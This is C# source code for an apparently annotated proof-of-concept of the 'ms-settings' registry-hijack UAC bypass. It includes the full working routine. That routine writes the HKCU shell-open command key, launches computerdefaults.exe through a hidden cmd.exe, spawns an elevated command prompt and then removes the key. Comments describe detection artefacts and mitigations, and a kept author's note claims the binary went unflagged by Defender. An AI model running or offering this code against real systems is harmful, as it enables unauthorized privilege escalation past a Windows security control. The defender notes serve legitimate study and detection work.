/// <summary>
/// Proof-of-concept for the per-user "ms-settings" shell-handler hijack, a UAC bypass
/// (MITRE ATT&CK T1548.002, Bypass User Account Control).
/// When the current token is not in the Administrators role, the method registers the
/// running executable as the open command for the ms-settings class under HKCU, launches
/// computerdefaults.exe through cmd.exe, and kills the current process.
/// When the token is already in the Administrators role, it blanks the hijacked command value.
/// </summary>
/// <remarks>
/// Defender notes: every registry write here lands in the current user's hive, so no
/// privilege is needed to make it. The durable artefacts are the key
/// HKCU\Software\Classes\ms-settings\shell\open\command, its (Default) value pointing at
/// an arbitrary executable, and a DelegateExecute value. Registry auditing (for example
/// Sysmon registry events) on that path is a reliable signal, as is a cmd.exe child that
/// starts computerdefaults.exe. Setting UAC to "Always notify" and keeping day-to-day
/// accounts out of the local Administrators group are the usual mitigations for bypasses
/// in this family.
/// </remarks>
public static void UAC()
{
    WindowsPrincipal windowsPrincipal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
    if (!windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator))
    {
        // Bypass.Z opens or creates HKCU\Software\<path>; the calls walk the key chain one level at a time.
        Bypass.Z("Classes");
        Bypass.Z("Classes\\ms-settings");
        Bypass.Z("Classes\\ms-settings\\shell");
        Bypass.Z("Classes\\ms-settings\\shell\\open");
        RegistryKey registryKey = Bypass.Z("Classes\\ms-settings\\shell\\open\\command");
        // Path of the currently executing assembly; this is what the hijacked handler will point at.
        string cpath = System.Reflection.Assembly.GetExecutingAssembly().Location;
        // (Default) value = this executable; DelegateExecute is written as DWORD 0.
        registryKey.SetValue("", cpath, RegistryValueKind.String);
        registryKey.SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
        registryKey.Close();
        try
        {
            // Hidden cmd.exe that starts computerdefaults.exe; this parent/child pair is a useful detection point.
            Process.Start(new ProcessStartInfo { CreateNoWindow = true, UseShellExecute = false, FileName = "cmd.exe", Arguments = "/c start computerdefaults.exe" });
        }
        // NOTE(review): failures to launch are silently swallowed, and the registry change is left in place.
        catch { }
        // The non-elevated instance terminates itself unconditionally after the launch attempt.
        Process.GetCurrentProcess().Kill();
    }
    else
    {
        // Already in the Administrators role: overwrite the (Default) command with an empty string.
        // NOTE(review): the key and the DelegateExecute value remain, and registryKey2 is never closed here.
        RegistryKey registryKey2 = Bypass.Z("Classes\\ms-settings\\shell\\open\\command");
        registryKey2.SetValue("", "", RegistryValueKind.String);
    }
}
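/// <summary>
/// Entry point of the interactive proof-of-concept.
/// If the process is not elevated, it asks the user for confirmation and, on "Yes",
/// calls <c>Bypass.UAC()</c>; any other answer exits. If the process is elevated, it
/// starts a command prompt, removes the hijacked handler under
/// HKCU\Software\Classes\ms-settings and shows a confirmation message.
/// </summary>
/// <remarks>
/// Line structure is restored here: in the collapsed listing the trailing <c>//</c>
/// comment swallowed the rest of the method. The elevation check is evaluated once
/// instead of twice, and the identical "No"/"Cancel" branches are merged.
/// Defender note: deleting the "shell" subtree removes the registry artefact after the
/// fact, so registry-write telemetry captured at the time of the change is more
/// dependable evidence than a later snapshot of the hive.
/// </remarks>
static void Main()
{
    try
    {
        bool elevated = IsAdministrator();
        if (!elevated)
        {
            DialogResult result = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel);
            if (result == DialogResult.Yes)
            {
                Bypass.UAC();
            }
            else
            {
                // A YesNoCancel dialog can only return Yes, No or Cancel; No and Cancel both exit.
                Environment.Exit(0);
            }
        }
        else
        {
            // What the demonstration runs once elevated.
            string command = "/c start cmd.exe ";
            Process.Start("CMD.exe", command);

            // Remove the hijacked ms-settings handler that Bypass.UAC() created.
            RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
            uac_clean.DeleteSubKeyTree("shell");
            uac_clean.Close();
            System.Windows.Forms.MessageBox.Show("Process Elevated!");
        }
    }
    catch
    {
        // Any failure (including a missing ms-settings key) ends the process without reporting.
        Environment.Exit(0);
    }
}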
/// <summary>
/// Opens the writable key HKCU\Software\<paramref name="x"/>, creating it when
/// <c>Bypass.checksubkey</c> rejects the opened handle.
/// </summary>
/// <param name="x">Sub-path below HKCU\Software (for example "Classes\\ms-settings").</param>
/// <returns>The opened key, or the key returned by <c>CreateSubKey</c>.</returns>
/// <remarks>
/// <c>checksubkey</c> is defined elsewhere; presumably it reports whether the key exists.
/// Everything this helper touches lives in the current user's hive, so it needs no elevation.
/// </remarks>
public static RegistryKey Z(string x)
{
    string path = "Software\\" + x;
    RegistryKey existing = Registry.CurrentUser.OpenSubKey(path, true);
    if (Bypass.checksubkey(existing))
    {
        return existing;
    }

    return Registry.CurrentUser.CreateSubKey(path);
}
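/// <summary>
/// Entry point of the non-interactive proof-of-concept variant.
/// If the process is not elevated, it calls <c>Bypass.UAC()</c>. If it is elevated,
/// it starts the example program (cmd.exe) and removes the hijacked handler under
/// HKCU\Software\Classes\ms-settings.
/// </summary>
/// <remarks>
/// Line structure is restored here: in the collapsed listing the <c>//</c> comments
/// swallowed the statements that followed them. The elevation check is evaluated once
/// instead of twice.
/// Defender note: the author's remark that the binary was not flagged is a point-in-time
/// observation about file scanning. The registry write to
/// HKCU\Software\Classes\ms-settings\shell\open\command and the resulting process chain
/// are behavioural signals that do not depend on a file signature.
/// </remarks>
static void Main()
{
    try
    {
        bool elevated = IsAdministrator();
        if (!elevated)
        {
            Bypass.UAC();
        }
        else
        {
            // Author's note, dated 5-02-2021: the binary was reportedly not flagged by Defender at that time.
            // cmd.exe is elevated purely as an example for the PoC.
            string WhatToElevate = "cmd.exe";
            Process.Start("CMD.exe", "/c start " + WhatToElevate);

            RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
            // Author's note: the hijacked handler has to be removed afterwards, otherwise
            // Windows right-click behaviour breaks.
            uac_clean.DeleteSubKeyTree("shell");
            uac_clean.Close();
        }
    }
    catch
    {
        // Any failure (including a missing ms-settings key) ends the process without reporting.
        Environment.Exit(0);
    }
}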
/// <summary>
/// Reads the "Version" property of the Win32_OperatingSystem management object obtained
/// through <c>Bypass.GetMngObj</c>.
/// </summary>
/// <returns>
/// The version value cast with <c>as string</c> (null when the property is not a string),
/// or <see cref="string.Empty"/> when no management object is returned or any exception
/// is thrown.
/// </returns>
public static string GetOsVer()
{
    try
    {
        ManagementObject osInfo = Bypass.GetMngObj("Win32_OperatingSystem");
        return osInfo == null ? string.Empty : osInfo["Version"] as string;
    }
    catch (Exception)
    {
        // Any failure in the lookup is reported as "unknown" rather than propagated.
        return string.Empty;
    }
}